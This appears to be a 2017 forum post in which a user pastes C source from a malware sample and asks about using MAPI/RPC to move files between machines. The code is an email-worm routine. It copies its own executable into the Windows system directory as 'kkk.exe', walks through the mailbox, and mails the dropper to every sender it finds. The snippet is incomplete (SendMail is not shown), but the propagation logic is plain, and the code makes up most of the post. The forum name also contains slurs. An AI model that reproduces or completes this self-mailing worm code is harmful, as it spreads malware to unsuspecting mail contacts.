User Controls

Navigation

Niggas in Space > Technophiliacs & Technophiles > MAPI/RPC & Transport Protocol related C question.

MAPI/RPC & Transport Protocol related C question.

  1. 2017-07-15 at 7:42 PM UTC
    #1
    Sophie Pedophile Tech Support
    So i was going over some code related to a malware i was checking out and i found something that looked interesting. As you know i am not much of a C programmer but i am not entirely clueless about the language. The code snippet i have here deals with MAPI and according to the comments in the source code relate to some worm type of behavioral routine.


    #include <windows.h>
    #include <mapi.h>

    /* MAPI mailing routine */
    DWORD WINAPI MailMySelf(LPVOID Data)
    {
               /* Variables and pointers to MAPI functions */
       	    CHAR rgchMsgID[513];
            MapiMessage *lpMessage;
    		HINSTANCE hi;
            LPMAPILOGON MAPILogon;
            LPMAPIFINDNEXT MAPIFindNext;
            LPMAPIREADMAIL MAPIReadMail;
            LPMAPISENDMAIL MAPISendMail;
            LPMAPILOGOFF MAPILogoff;
            LHANDLE lhSession;
    		char dropper[MAX_PATH];
    		char MyPath[MAX_PATH];
            
    		if(!(hi = LoadLibrary( "mapi32.dll" ))) 
    		{
    			/* Fail to load mapi */
    			return;
    		}

               /* Get mapi functions */
    		MAPILogon = (LPMAPILOGON)GetProcAddress( hi, "MAPILogon");
            
    		MAPIFindNext = (LPMAPIFINDNEXT)GetProcAddress( hi, "MAPIFindNext");
            
    		MAPIReadMail = (LPMAPIREADMAIL)GetProcAddress( hi, "MAPIReadMail");
            
    		MAPISendMail = (LPMAPISENDMAIL)GetProcAddress( hi, "MAPISendMail");
    		
    		MAPILogoff = (LPMAPILOGOFF)GetProcAddress(hi,"MAPILogoff");
      
           /* Check them */
      if( MAPILogon == NULL || MAPIFindNext == NULL || MAPIReadMail == NULL || 
    	  MAPISendMail == NULL || MAPILogoff == NULL) 
      {
    	  /* No MAPI functions :( */
    	  return;
      }
      
      /* Copy to dropper */
      GetModuleFileName(NULL,MyPath,MAX_PATH);
      GetSystemDirectory(dropper,MAX_PATH);
      strcat(dropper,"\\kkk.exe");
      CopyFile(MyPath,dropper,FALSE);

          /* Ok !, try to login  */
      if(MAPILogon( 0, NULL, NULL, 0, 0, &lhSession) == SUCCESS_SUCCESS)
      {
                    
    	  *rgchMsgID = NULL;
                    
    				while(1)
                    {
                        
    					if(MAPIFindNext( lhSession, 0L, NULL, rgchMsgID, MAPI_LONG_MSGID, 0L, rgchMsgID) != SUCCESS_SUCCESS) 
    					{
    			           break;
    					}
                        
    					        /* Read mail */
    					    if( MAPIReadMail( lhSession, 0L, rgchMsgID, MAPI_PEEK, 0L, &lpMessage) == SUCCESS_SUCCESS)
    						{
    				              /* Send ! */     
    							SendMail(lpMessage->lpOriginator->lpszAddress,MAPISendMail,
    								lhSession,dropper);
    						}
    			}
    				
    				MAPILogoff( lhSession, 0L, 0L, 0L);
      
      }

      FreeLibrary(hi);

    }


    Now i know that MAPI is messaging architecture and a COM object for Windows and is used by Outlook similar programs but reading the comments it looked to me that the author had intended it as a propagation mechanism or at least as part thereof. Would it be possible to use MAPI and the RPC as a transport protocol to transfer arbitrary data or files to machines on the same subnet?

    If so, how is this exactly accomplished, and if I am wrong about the function i pasted please tell me a little about what it is supposed to do to the best of your knowledge.

    Post last edited by Sophie at 2017-07-15T19:45:11.419657+00:00
Jump to Top